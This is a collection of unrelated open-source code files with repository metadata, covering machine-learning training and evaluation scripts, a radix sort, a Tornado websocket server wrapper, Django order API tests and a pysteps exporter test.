slim.conv2d(\n self.input,\n num_outputs=32, kernel_size=[3, 8],\n stride=[1, 1], padding='Valid',\n scope=self.scope+'_conv1'\n )\n self.conv2 = slim.conv2d(\n self.conv1,\n num_outputs=64, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv2'\n )\n self.conv3 = slim.conv2d(\n self.conv2,\n num_outputs=128, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv3'\n )\n self.pool = slim.max_pool2d(self.conv3, [2, 2])\n\n hidden_layer = tf.layers.Dense(\n 512,\n activation=tf.nn.relu)\n self.hidden = hidden_layer(slim.flatten(self.pool), scope=self.scope+'_hidden')\n classes_layer = tf.layers.Dense(\n self.n_classes,\n activation=None)\n self.classes = classes_layer(tf.nn.dropout(self.hidden, self.dropout_keep_prob), scope=self.scope+'_fc')\n\n self.targets = tf.placeholder(tf.int32, [None])\n self.targets_onehot = tf.one_hot(self.targets, self.n_classes)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=self.targets_onehot,\n logits=self.classes\n ))\n self.train_step = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(\n self.loss,\n var_list=[hidden_layer.variables, classes_layer.variables]\n )\n\n\nclass FineTuningClassifierBis:\n def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n \"\"\"Defining the model for fine tuning.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.model = tf.keras.Sequential()\n\n self.input = tf.keras.Input(dtype=tf.float32, shape=(None, img_h, img_w, 1))\n\n conv1_layer = tf.layers.Conv2D(filters=32, kernel_size=[3, 8], stride=[1, 1], padding='valid')\n self.model.add(conv1_layer)\n\n conv2_layer = tf.layers.Conv2D(filters=64, kernel_size=[5, 5], stride=[2, 2], padding='valid')\n self.model.add(conv2_layer)\n\n conv3_layer = 
tf.layers.Conv2D(filters=128, kernel_size=[5, 5], strides=[2, 2], padding='valid')\n        self.model.add(conv3_layer)\n\n        pool = tf.layers.MaxPooling2D(pool_size=[2, 2], strides=[2,2], padding='valid')\n        self.model.add(pool)\n\n        self.model.add(tf.layers.Flatten())\n        hidden_layer = tf.layers.Dense(units=512, activation=tf.nn.relu)\n        self.model.add(hidden_layer)\n\n        self.model.add(tf.layers.Dropout(rate=1.0 - self.dropout_keep_prob))  # rate is the fraction to drop, not to keep\n        classes_layer = tf.layers.Dense(units=self.n_classes, activation=None)\n        self.model.add(classes_layer)\n\n        # freeze the convolutional layers (set trainable on the layer objects themselves)\n        conv1_layer.trainable = False\n        conv2_layer.trainable = False\n        conv3_layer.trainable = False\n\n        self.model.compile(optimizer=tf.optimizers.RMSprop(learning_rate=learning_rate),\n                           loss=tf.nn.softmax_cross_entropy_with_logits_v2)\n\n\ndef train(model_name, training_dataset, validation_dataset, train_steps=500000, pretrained=None, fine_tuning=False,\n          learning_rate=1e-3):\n    if fine_tuning and pretrained is None:\n        raise ValueError(\"if fine_tuning is True, you must provide a pretrained model.\")\n\n    img_h, img_w = 64, 64\n    batch_size = 10\n    start = datetime.now()\n    best_acc = 0\n    best_loss = np.infty\n\n    if fine_tuning:\n        nn = FineTuningClassifier('classifier', img_w, img_h, len(preprocessing.CLASSES), dropout_keep_prob=0.8,\n                                  learning_rate=learning_rate)\n\n        # thanks to https://github.com/KranthiGV/Pretrained-Show-and-Tell-model/issues/7#issuecomment-309862894\n        vars_to_rename = {\n            \"lstm/basic_lstm_cell/weights\": \"lstm/basic_lstm_cell/kernel\",\n            \"lstm/basic_lstm_cell/biases\": \"lstm/basic_lstm_cell/bias\",\n        }\n        new_checkpoint_vars = {}\n        reader = tf.train.NewCheckpointReader(pretrained)\n        for old_name in reader.get_variable_to_shape_map():\n            if old_name in vars_to_rename:\n                new_name = vars_to_rename[old_name]\n            else:\n                new_name = old_name\n            new_checkpoint_vars[new_name] = tf.Variable(reader.get_tensor(old_name))\n        print(\"new checkpoint vars:\", new_checkpoint_vars)\n    else:\n        nn = Classifier('classifier', img_w, img_h, len(preprocessing.CLASSES), dropout_keep_prob=0.8,\n                        learning_rate=learning_rate)\n\n    dataset = list(map(lambda f: f.strip(),\n                       open(training_dataset, 'r').readlines()))\n    validation_dataset = list(map(lambda f: f.strip(),\n                                  open(validation_dataset, 'r').readlines()))\n\n    with tf.Session() as sess:\n        \n        init = tf.global_variables_initializer()\n        sess.run(init)\n        if fine_tuning:\n            saver_loader = tf.train.Saver(new_checkpoint_vars)\n        else:\n            saver_loader = tf.train.Saver()\n        saver = tf.train.Saver(max_to_keep=3)\n        best_acc_saver = tf.train.Saver(max_to_keep=100)\n        best_loss_saver = tf.train.Saver(max_to_keep=100)\n        summary_writer = tf.summary.FileWriter('summaries/'+model_name)\n\n        # todo debug\n        # saver.export_meta_graph(\"saver2.txt\", as_text=True)\n        # quit(-1)\n\n        if pretrained is not None:\n            saver_loader.restore(sess, pretrained)\n            print(\"pretrained model loaded\")\n\n        for t in range(train_steps):\n            \n            # perform training step\n            images, labels = preprocessing.get_batch(dataset, batch_size, (img_h, img_w))\n            loss, _ = sess.run([nn.loss, nn.train_step], feed_dict={\n                nn.input: images,\n                nn.targets: labels\n            })\n\n            # show and save training status\n            if t % 10000 == 0:\n                print(\"save\")\n                saver.save(sess, 'saves/step_'+model_name, global_step=t)\n\n            summary = tf.Summary()\n            summary.value.add(tag='Loss', simple_value=float(loss))\n            if t % 100 == 0:\n                # testing model on validation set occasionally\n                images, labels = preprocessing.get_batch(\n                    validation_dataset, 100, (img_h, img_w))\n                classes = 
sess.run(nn.classes, feed_dict={nn.input: images})\n predictions = np.argmax(classes, -1)\n\n val_err = float(sum(predictions != labels))\n summary.value.add(tag='ValidationError', simple_value=val_err)\n\n val_acc = sklearn.metrics.accuracy_score(labels, predictions)\n summary.value.add(tag='ValidationAccuracy', simple_value=val_acc)\n\n delta = datetime.now() - start\n print(f\"step {t}/{train_steps}, loss: {loss}, valErr: {val_err}, valAcc: {val_acc}, elapsed time: {delta}\")\n\n if val_acc > best_acc:\n best_acc_saver.save(sess, f'saves/best_acc_{model_name}_{best_acc}', global_step=t)\n best_acc = val_acc\n print(\"new val acc\", best_acc)\n\n if loss < best_loss:\n best_loss_saver.save(sess, f'saves/best_loss_{model_name}_{best_loss}', global_step=t)\n best_loss = loss\n print(\"new loss\", best_loss)\n\n summary_writer.add_summary(summary, t)\n summary_writer.flush()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', type=str, required=True, help='Training dataset name')\n parser.add_argument('-v', type=str, required=True, help='Validation dataset name')\n parser.add_argument('-m', type=str, required=True, help='Model name')\n parser.add_argument('-i', type=int, help='Training steps (iterations)')\n parser.add_argument('-l', type=float, help='Learning rate')\n parser.add_argument('-f', action='store_true', help='Perform fine-tuning')\n parser.add_argument('-p', type=str, help='Pretrained model')\n\n opt = parser.parse_args()\n\n # es: python train.py -t datasplits/good_train -v datasplits/good_validation -m finetuning\n # -i 1e6+1 -l 5e-5 -f -p models/top_fnt\n train(opt.m, opt.t, opt.v, train_steps=opt.i, pretrained=opt.p, fine_tuning=opt.f, learning_rate=opt.l)\n","repo_name":"GioFic95/UAV-object-detection","sub_path":"afc/chars_rec/chars74k-master/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"42712178299","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n\"\"\"\nThis is used by otter docker container to customize otter's config based on env\nvariables. 
Pass in a sample config file to it.\n\"\"\"\n\nimport json\nimport os\nimport sys\n\nconf = json.load(open(sys.argv[1]))\nconf[\"url_root\"] = os.environ[\"URL_ROOT\"]\nconf[\"identity\"][\"url\"] = os.environ[\"IDENTITY_URL\"]\nconf[\"identity\"][\"admin_url\"] = os.environ[\"IDENTITY_URL\"]\nconf[\"cassandra\"][\"seed_hosts\"] = os.environ[\"CASS_HOSTS\"].split(\",\")\nconf[\"zookeeper\"][\"hosts\"] = os.environ[\"ZK_HOSTS\"]\ndel conf[\"cloudfeeds\"]\ndel conf[\"cloud_client\"]\nconf[\"converger\"][\"interval\"] = 10\nconf[\"converger\"][\"build_timeout\"] = 30\nconf[\"selfheal\"][\"interval\"] = 20\n\nprint(json.dumps(conf, indent=2))\n","repo_name":"rackerlabs/otter","sub_path":"scripts/cust_conf.py","file_name":"cust_conf.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"10458908832","text":"\"\"\"Implementation of the radix sort algorithm\"\"\"\n\nfrom typing import List\n\n# possible pitfalls\n    # convert number back to number data type in get_digit\n    # return a number data type in get_digit\n\ndef get_digit(number: int, place: int):\n    \"\"\"Returns digit from the number at a given place\"\"\"\n    # get_digit(12345, 0) returns 5\n    number_str = str(number)\n    if place >= len(number_str):\n        return 0\n    reversed_str: str = \"\"\n    i: int = len(number_str) - 1\n    while i >= 0:\n        reversed_str += number_str[i]\n        i -= 1\n    return int(reversed_str[place])  # convert back to int so both branches return a number\n    \ndef digit_count(number: int):\n    \"\"\"Returns the length of an integer number\"\"\"\n    return len(str(number))\n\ndef most_digits(numbers: List[int]):\n    \"\"\"Returns the number of digits in the largest numbers in the list\"\"\"\n    most_numbers_length = 0\n    for number in numbers:\n        current_count = digit_count(number)\n        if current_count > most_numbers_length:\n            most_numbers_length = current_count\n    return most_numbers_length\n\ndef radix_sort(lst: List[int]):\n    \"\"\"Sorts a list of positive integer values using the radix sort algorithm\"\"\"\n    largest_range = most_digits(lst)\n    for i in range(0, largest_range):\n        buckets = [[] for i in range(0, 10)]\n        for number in lst:\n            current_digit = int(get_digit(number, i)) ## 3221 - 1\n            buckets[current_digit].append(number)\n        lst = [element for sublist in buckets for element in sublist]\n    return lst\n","repo_name":"codeme254/data-structures-and-algorithms-in-python","sub_path":"0x0D-radix_sort/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32021123008","text":"from typing import Any, List\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn import metrics\n\nfrom utils.ml_logging import get_logger\n\n# Set up logging\nlogger = get_logger()\n\n\ndef make_confusion_matrix(model, X_test, y_actual, labels=[1, 0]):\n    \"\"\"\n    Generate confusion matrix for the fitted model.\n\n    Parameters:\n    model (Model): Classifier to predict values of X_test.\n    X_test (array): Test set.\n    y_actual (array): Ground truth.\n    labels (list): List of labels to create confusion matrix.\n\n    Returns:\n    None\n    \"\"\"\n    y_predict = model.predict(X_test)\n    cm = metrics.confusion_matrix(y_actual, y_predict, labels=labels)\n    df_cm = pd.DataFrame(\n        cm,\n        index=[f\"Actual - {label}\" for label in labels],\n        columns=[f\"Predicted - {label}\" for label in labels],\n    )\n    group_counts = [\"{0:0.0f}\".format(value) for value in 
cm.flatten()]\n group_percentages = [\"{0:.2%}\".format(value) for value in cm.flatten() / np.sum(cm)]\n labels = [f\"{v1}\\n{v2}\" for v1, v2 in zip(group_counts, group_percentages)]\n labels = np.asarray(labels).reshape(2, 2)\n plt.figure(figsize=(10, 7))\n sns.heatmap(df_cm, annot=labels, fmt=\"\")\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n\n\ndef get_metrics_score(\n model: Any,\n X_train: np.ndarray,\n y_train: np.ndarray,\n X_test: np.ndarray,\n y_test: np.ndarray,\n log_scores: bool = True,\n) -> List[float]:\n \"\"\"\n Calculate different metric scores of the model - Accuracy, Recall, and Precision.\n\n Parameters:\n model (Model): Classifier to predict values of X.\n X_train (array): Training set.\n y_train (array): Training set labels.\n X_test (array): Test set.\n y_test (array): Test set labels.\n log_scores (bool): Flag to log the scores. Default is True.\n\n Returns:\n list: List containing metric scores.\n \"\"\"\n # defining an empty list to store train and test results\n score_list: List[float] = []\n\n # Predictions\n pred_train = model.predict(X_train)\n pred_test = model.predict(X_test)\n\n # Accuracy\n train_acc = model.score(X_train, y_train)\n test_acc = model.score(X_test, y_test)\n\n # Recall\n train_recall = metrics.recall_score(y_train, pred_train)\n test_recall = metrics.recall_score(y_test, pred_test)\n\n # Precision\n train_precision = metrics.precision_score(y_train, pred_train)\n test_precision = metrics.precision_score(y_test, pred_test)\n\n score_list.extend(\n (\n train_acc,\n test_acc,\n train_recall,\n test_recall,\n train_precision,\n test_precision,\n )\n )\n\n if log_scores:\n logger.info(f\"Accuracy on training set : {train_acc}\")\n logger.info(f\"Accuracy on test set : {test_acc}\")\n logger.info(f\"Recall on training set : {train_recall}\")\n logger.info(f\"Recall on test set : {test_recall}\")\n logger.info(f\"Precision on training set : {train_precision}\")\n logger.info(f\"Precision on test set : {test_precision}\")\n\n return score_list\n\n\ndef generate_comparison_frame(\n models: List[Any],\n model_names: List[str],\n X_train: np.ndarray,\n y_train: np.ndarray,\n X_test: np.ndarray,\n y_test: np.ndarray,\n log_scores: bool = True,\n) -> pd.DataFrame:\n \"\"\"\n Generate a comparison DataFrame for given models based on their metrics.\n\n Parameters:\n models (List[ClassifierMixin]): A list of trained sklearn models.\n model_names (List[str]): A list of names corresponding to the models.\n X_train (array): Training set.\n y_train (array): Training set labels.\n X_test (array): Test set.\n y_test (array): Test set labels.\n log_scores (bool): Flag to log the scores. 
Default is True.\n\n Returns:\n pd.DataFrame: A DataFrame with Train and Test Accuracy, Recall, and Precision for each model.\n \"\"\"\n\n # Initializing empty lists to store metrics\n acc_train, acc_test = [], []\n recall_train, recall_test = [], []\n precision_train, precision_test = [], []\n\n # Loop through models, get metrics, and append to respective lists\n for model in models:\n (\n train_acc,\n test_acc,\n train_recall,\n test_recall,\n train_precision,\n test_precision,\n ) = get_metrics_score(\n model, X_train, y_train, X_test, y_test, log_scores=log_scores\n )\n acc_train.append(np.round(train_acc, 2))\n acc_test.append(np.round(test_acc, 2))\n recall_train.append(np.round(train_recall, 2))\n recall_test.append(np.round(test_recall, 2))\n precision_train.append(np.round(train_precision, 2))\n precision_test.append(np.round(test_precision, 2))\n\n # Create and return comparison DataFrame\n comparison_frame = pd.DataFrame(\n {\n \"Model\": model_names,\n \"Train_Accuracy\": acc_train,\n \"Test_Accuracy\": acc_test,\n \"Train_Recall\": recall_train,\n \"Test_Recall\": recall_test,\n \"Train_Precision\": precision_train,\n \"Test_Precision\": precision_test,\n }\n )\n\n return comparison_frame\n","repo_name":"pablosalvador10/azure-ai-gbb-solution-template","sub_path":"src/training/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} {"seq_id":"31809134944","text":"from typing import List\n\n\nclass Solution:\n def checkDistances(self, s: str, distance: List[int]) -> bool:\n d={}\n ch=ord('a')\n for i in distance:\n d[chr(ch)]=i\n ch+=1\n sl=set()\n for i in range(len(s)):\n for j in range(i+1, len(s)):\n if s[i]==s[j] and d[s[i]]==(j-i)-1:\n sl.add(s[i])\n return sl == set(s)\n","repo_name":"swetha627/LEETCODE","sub_path":"2399-check-distances-between-same-letters/2399-check-distances-between-same-letters.py","file_name":"2399-check-distances-between-same-letters.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} {"seq_id":"33563200557","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport tempfile\nfrom datetime import datetime\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\n\nfrom pysteps.io import import_netcdf_pysteps\nfrom pysteps.io.exporters import _get_geotiff_filename\nfrom pysteps.io.exporters import close_forecast_files\nfrom pysteps.io.exporters import export_forecast_dataset\nfrom pysteps.io.exporters import initialize_forecast_exporter_netcdf\nfrom pysteps.tests.helpers import get_precipitation_fields, get_invalid_mask\n\n# Test arguments\nexporter_arg_names = (\"n_ens_members\", \"incremental\")\n\nexporter_arg_values = [\n (1, None),\n (1, \"timestep\"),\n (2, None),\n (2, \"timestep\"),\n (2, \"member\"),\n]\n\n\ndef test_get_geotiff_filename():\n \"\"\"Test the geotiff name generator.\"\"\"\n\n start_date = datetime.strptime(\"201909082022\", \"%Y%m%d%H%M\")\n\n n_timesteps = 50\n timestep = 5\n\n for timestep_index in range(n_timesteps):\n file_name = _get_geotiff_filename(\n \"test/path\", start_date, n_timesteps, timestep, timestep_index\n )\n expected = (\n f\"test/path_201909082022_\" f\"{(timestep_index + 1) * timestep:03d}.tif\"\n )\n assert expected == file_name\n\n\n@pytest.mark.parametrize(exporter_arg_names, exporter_arg_values)\ndef 
test_io_export_netcdf_one_member_one_time_step(n_ens_members, incremental):\n \"\"\"\n Test the export netcdf.\n Also, test that the exported file can be read by the importer.\n \"\"\"\n\n pytest.importorskip(\"pyproj\")\n\n precip, metadata = get_precipitation_fields(\n num_prev_files=2, return_raw=True, metadata=True, source=\"fmi\"\n )\n\n invalid_mask = get_invalid_mask(precip)\n\n with tempfile.TemporaryDirectory() as outpath:\n # save it back to disk\n outfnprefix = \"test_netcdf_out\"\n file_path = os.path.join(outpath, outfnprefix + \".nc\")\n startdate = metadata[\"timestamps\"][0]\n timestep = metadata[\"accutime\"]\n n_timesteps = 3\n shape = precip.shape[1:]\n\n exporter = initialize_forecast_exporter_netcdf(\n outpath,\n outfnprefix,\n startdate,\n timestep,\n n_timesteps,\n shape,\n metadata,\n n_ens_members=n_ens_members,\n incremental=incremental,\n )\n\n if n_ens_members > 1:\n precip = np.repeat(precip[np.newaxis, :, :, :], n_ens_members, axis=0)\n\n if incremental == None:\n export_forecast_dataset(precip, exporter)\n if incremental == \"timestep\":\n for t in range(n_timesteps):\n if n_ens_members > 1:\n export_forecast_dataset(precip[:, t, :, :], exporter)\n else:\n export_forecast_dataset(precip[t, :, :], exporter)\n if incremental == \"member\":\n for ens_mem in range(n_ens_members):\n export_forecast_dataset(precip[ens_mem, :, :, :], exporter)\n\n close_forecast_files(exporter)\n\n # assert if netcdf file was saved and file size is not zero\n assert os.path.exists(file_path) and os.path.getsize(file_path) > 0\n\n # Test that the file can be read by the nowcast_importer\n output_file_path = os.path.join(outpath, f\"{outfnprefix}.nc\")\n\n precip_new, _ = import_netcdf_pysteps(output_file_path)\n\n assert_array_almost_equal(precip.squeeze(), precip_new.data)\n assert precip_new.dtype == \"single\"\n\n precip_new, _ = import_netcdf_pysteps(output_file_path, dtype=\"double\")\n assert_array_almost_equal(precip.squeeze(), precip_new.data)\n assert precip_new.dtype == \"double\"\n\n precip_new, _ = import_netcdf_pysteps(output_file_path, fillna=-1000)\n new_invalid_mask = precip_new == -1000\n assert (new_invalid_mask == invalid_mask).all()\n","repo_name":"pySTEPS/pysteps","sub_path":"pysteps/tests/test_exporters.py","file_name":"test_exporters.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"27"} +{"seq_id":"20788985145","text":"\"\"\"\ndefine User:\n def socket_starts(self,socket) #gets called when the connection is ready; socket is the active connection\n def socket_process(self,identifier,content) #gets called for each message received\n def socket_updates(self) #gets called every 1./30 of a second if socket.updating == True\n def socket_closes(self) #gets called on loss of connection\n\n #note: socket_send(self,identifier,container) gets assigned before socket_starts\nUser can access socket by:\n self.socket_send(identifier,content = None) #to send messages\n self.socket_send() #to close socket\n\nrun_websocket_application_forever(User,path = r\"/websocket\",port = 8888)\n #accepts connections going to path,port\n #when a connection is opened a new User is created\n\"\"\"\n\nimport sys\nsys.path.append(\"tornado-3.1/\")\nimport tornado.ioloop, tornado.web, tornado.websocket\n\nimport json\nfrom queue import Queue,Empty\nimport threading\nimport time\nimport traceback\n\nclass MessageFormatError(Exception):\n pass\n\nclass MessageProcessingError(Exception):\n pass\n \n\n\nclass 
WebSocket(tornado.websocket.WebSocketHandler):\n active_sockets = set()\n User = None\n send_sleep_time = 1/30 #assumes all calculations in update are instant\n read_sleep_time = 1/1000\n assert (read_sleep_time < send_sleep_time) and (send_sleep_time % read_sleep_time < 1/1000), \"read_sleep_time must be an approximate fraction of send_sleep_time\"\n\n def open(self):\n self.set_nodelay(True)\n self.active_sockets.add(self)\n\n self.send_queue = Queue()\n self.receive_queue = Queue()\n \n self.running = True\n self.updating = False\n\n self.user = None #to be initialized in the thread\n\n self.thread = threading.Thread(target = self.run)\n self.thread.start()\n\n def on_message(self, messages):\n self.receive_queue.put_nowait(messages)\n\n def load_messages(self):\n while True:\n try:\n messages = self.receive_queue.get_nowait()\n except Empty:\n break #break out of the while True\n\n try:\n messages = json.loads(messages)\n except Exception as e:\n raise MessageFormatError(e)\n \n if type(messages) is not list:\n raise MessageFormatError()\n\n for m in messages:\n if (type(m) is not list) or not(1 <= len(m) <= 2):\n raise MessageFormatError()\n\n if type(m[0]) is not str:\n raise MessageFormatError()\n\n try:\n if len(m) == 2:\n self.user.socket_process(m[0],m[1])\n else:\n self.user.socket_process(m[0],None)\n except Exception as e:\n raise MessageProcessingError(e)\n\n\n def dump_messages(self):\n messages = []\n \n while True:\n try:\n messages.append(self.send_queue.get_nowait())\n except Empty:\n break #break out of the while True\n\n if len(messages):\n self.write_message(json.dumps(messages))\n\n def run(self):\n try:\n self.user = self.User()\n self.user.socket_send = self.send\n self.user.socket_starts()\n\n while self.running:\n\n self.user.socket_updates()\n self.dump_messages()\n now = time.time()\n while time.time()-now < self.send_sleep_time: #i want to read more often than dump messages\n self.load_messages()\n time.sleep(self.read_sleep_time) # sleep the short read interval, not the send interval\n\n except:\n traceback.print_exc() # print_exc() reports the active exception; print_last() would fail here\n finally:\n try:\n self.user.socket_closes()\n except:\n traceback.print_exc()\n try:\n self.close()\n except:\n pass #i tried, this is tornado's fault if it doesn't close\n\n def on_close(self):\n self.running = False\n self.active_sockets.remove(self)\n\n #def close(self): inherited\n \n def __call__(self,identifier = None,content = None):\n if identifier is None:\n self.close()\n else:\n assert isinstance(identifier,str), \"identifier must be a string.\"\n if content is not None:\n self.send_queue.put_nowait([identifier,content])\n else:\n self.send_queue.put_nowait([identifier])\n\n send = __call__\n\n\n\n\n\ndef run_websocket_application_forever(User,path = r\"/websocket\",port = 8888):\n #User class checks\n assert callable(getattr(User, \"socket_process\", None)), \"class has not defined socket_process(self,identifier,content).\"\n assert callable(getattr(User, \"socket_updates\", None)), \"class has not defined socket_updates(self).\"\n assert callable(getattr(User, \"socket_starts\", None)), \"class has not defined socket_starts(self).\"\n assert callable(getattr(User, \"socket_closes\", None)), \"class has not defined socket_closes(self).\"\n WebSocket.User = User\n \n\n application = tornado.web.Application([\n (path, WebSocket),\n ])\n\n application.listen(port)\n print(\"WebSocket application forever loop.\")\n 
tornado.ioloop.IOLoop.instance().start()\n\n","repo_name":"csiz/ep2","sub_path":"server/connections/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16744381844","text":"from django.test import TestCase\nfrom rest_framework.test import RequestsClient, APITestCase\nfrom django.contrib.auth.models import User, Permission, Group, ContentType\nfrom rest_framework import status\nimport json\n\nfrom pos_backend.core.tests import setup_items\nfrom .models import Order, OrderItem\n\n\n# Create your tests here.\n\nclient = RequestsClient()\nclient.headers.update({'Content-Type': 'application/json'})\n\ndef setup_user_assistant():\n user = User.objects.create_user(\n username='user_assistant',\n email='user_assistant@user.com',\n password='password_assistant'\n )\n group = Group.objects.create(\n name=\"Assistant\"\n )\n user.groups.add(group)\n\n content_type_list = ('order', 'orderitem',)\n for content_type_model in content_type_list:\n content_type = ContentType.objects.get(\n app_label='order',\n model=content_type_model\n )\n permissions = Permission.objects.filter(content_type=content_type)\n for permission in permissions:\n group.permissions.add(permission)\n\n content_type_list_viewonly = ('item',)\n for content_type_model in content_type_list_viewonly:\n content_type = ContentType.objects.get(\n app_label='core',\n model=content_type_model\n )\n permissions = Permission.objects.filter(\n content_type=content_type,\n codename='view_{0}'.format(content_type_model)\n )\n for permission in permissions:\n group.permissions.add(permission)\n\n return {'user': user, 'password': 'password_assistant'}\n\n\ndef setup_user_token(user):\n url = 'http://localhost:8000/api/token/'\n credentials = {\n \"username\": user['user'].username,\n \"password\": user['password']\n }\n\n response = client.post(\n url,\n data=json.dumps(credentials)\n )\n return response.json()\n\n\nclass OrderTest(TestCase):\n def setUp(self):\n self.items = setup_items()\n self.user = setup_user_assistant()\n\n def test_order_anonymous(self):\n order = Order.objects.create()\n for idx, item in enumerate(self.items, start=1):\n order.item.create(\n name=item,\n quantity=idx\n )\n self.assertIsNone(order, msg=order.pk)\n\n def test_order_items(self):\n self.client.force_login(user=self.user['user'])\n\n order = Order.objects.create(\n assigned=self.user['user']\n )\n for idx, item in enumerate(self.items, start=1):\n order.item.create(\n name=item,\n quantity=idx\n )\n self.assertEqual(order.total, 300)\n self.assertEqual(order.assigned, self.user['user'])\n self.assertEqual(order.item.all()[0].item_total, 100)\n self.assertEqual(order.item.all()[1].item_total, 200)\n\n\nclass OrderAPITest(APITestCase):\n def setUp(self):\n self.items = setup_items()\n self.user = setup_user_assistant()\n self.user_token = setup_user_token(self.user)\n\n def test_items_access(self):\n url = 'http://localhost:8000/api/item/'\n header = {\"Authorization\": \"Bearer {0}\".format(\n self.user_token['access']\n )}\n response = client.get(\n url,\n headers=header\n )\n self.assertEqual(\n response.status_code,\n status.HTTP_200_OK,\n msg=response.json()\n )\n\n def test_item_anonymous(self):\n url = 'http://localhost:8000/api/item/'\n response = client.get(\n url,\n )\n self.assertEqual(\n response.status_code,\n status.HTTP_401_UNAUTHORIZED,\n msg=response.json()\n )\n\n def test_order_items_api(self):\n url = 
'http://localhost:8000/api/order/'\n header = {\"Authorization\": \"Bearer {0}\".format(\n self.user_token['access']\n )}\n response = client.get(\n url,\n headers=header\n )\n data = {\"item\": []}\n for idx, item in enumerate(self.items, start=1):\n data['item'].append({\n \"name\": item.pk,\n \"quantity\": idx\n })\n response = client.post(\n url,\n data=json.dumps(data),\n headers=header\n )\n order = response.json()\n self.assertEqual(order['total'], 300)\n","repo_name":"ZeroExistence/pos_backend","sub_path":"pos_backend/order/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"36467467123","text":"import os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os.path as osp\nimport shutil\n\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass initialize_dataset:\n def __init__(self, config, batch_csv):\n self.config = config\n self.dataset_params = config[\"dataset_params\"]\n self.dataset_root = self.dataset_params[\"root_dir\"]\n self.dataset = self.dataset_params[\"use\"]\n self.dataset_base = osp.join(os.getcwd(), self.dataset_root, self.dataset)\n if batch_csv is not None:\n csv = batch_csv\n else:\n csv = self.dataset_params[self.dataset][\"csv_filename\"]\n self.dataset_file = osp.join(self.dataset_base,\"batch-info\", csv)\n self.images_dir = self.dataset_params[self.dataset][\"images_dir\"]\n\n def create_dataset_csv(self):\n if osp.isfile(self.dataset_file):\n return\n df = pd.DataFrame(os.listdir(self.images_dir))\n df.to_csv(self.dataset_file, index=False, header=False)\n\n\nclass custom_dataset(Dataset):\n def __init__(self, dataset_file, images_dir, img_resolution, outdir):\n self.images_df = pd.read_csv(dataset_file, index_col=False, header=None)\n self.images_dir = images_dir\n self.img_resolution = img_resolution\n self.outdir = outdir\n\n def __len__(self):\n return len(self.images_df)\n\n def __getitem__(self, index):\n\n image_name = self.images_df.iat[index, 0]\n image = osp.join(self.images_dir, image_name)\n\n name_arr = image_name.split(\".\")\n target_image = osp.join(self.outdir, name_arr[0], \"target.\" + name_arr[1])\n if not osp.isfile(target_image):\n os.makedirs(osp.join(self.outdir, name_arr[0]), exist_ok=True)\n shutil.copy2(image, target_image)\n\n target_pil = Image.open(image).convert(\"RGB\")\n w, h = target_pil.size\n s = min(w, h)\n target_pil = target_pil.crop(\n ((w - s) // 2, (h - s) // 2, (w + s) // 2, (h + s) // 2)\n )\n target_pil = target_pil.resize(\n (self.img_resolution, self.img_resolution), Image.LANCZOS\n )\n target_uint8 = np.array(target_pil, dtype=np.uint8)\n\n return (\n torch.tensor(\n target_uint8.transpose([2, 0, 1]), device=torch.device(\"cuda\")\n ),\n image_name,\n )\n\n\ndef get_dataloader(config, batch_csv, outdir):\n init_dataset = initialize_dataset(config, batch_csv)\n init_dataset.create_dataset_csv()\n gen = config[\"projector_params\"][\"general\"][\"use_generator\"]\n gen_resolution = config[\"projector_params\"][\"generators\"][gen][\"img_resolution\"]\n dataset = custom_dataset(\n init_dataset.dataset_file, init_dataset.images_dir, gen_resolution, outdir\n )\n dataloader = DataLoader(\n dataset,\n shuffle=False,\n batch_size=config[\"projector_params\"][\"general\"][\"batch_size\"],\n )\n return 
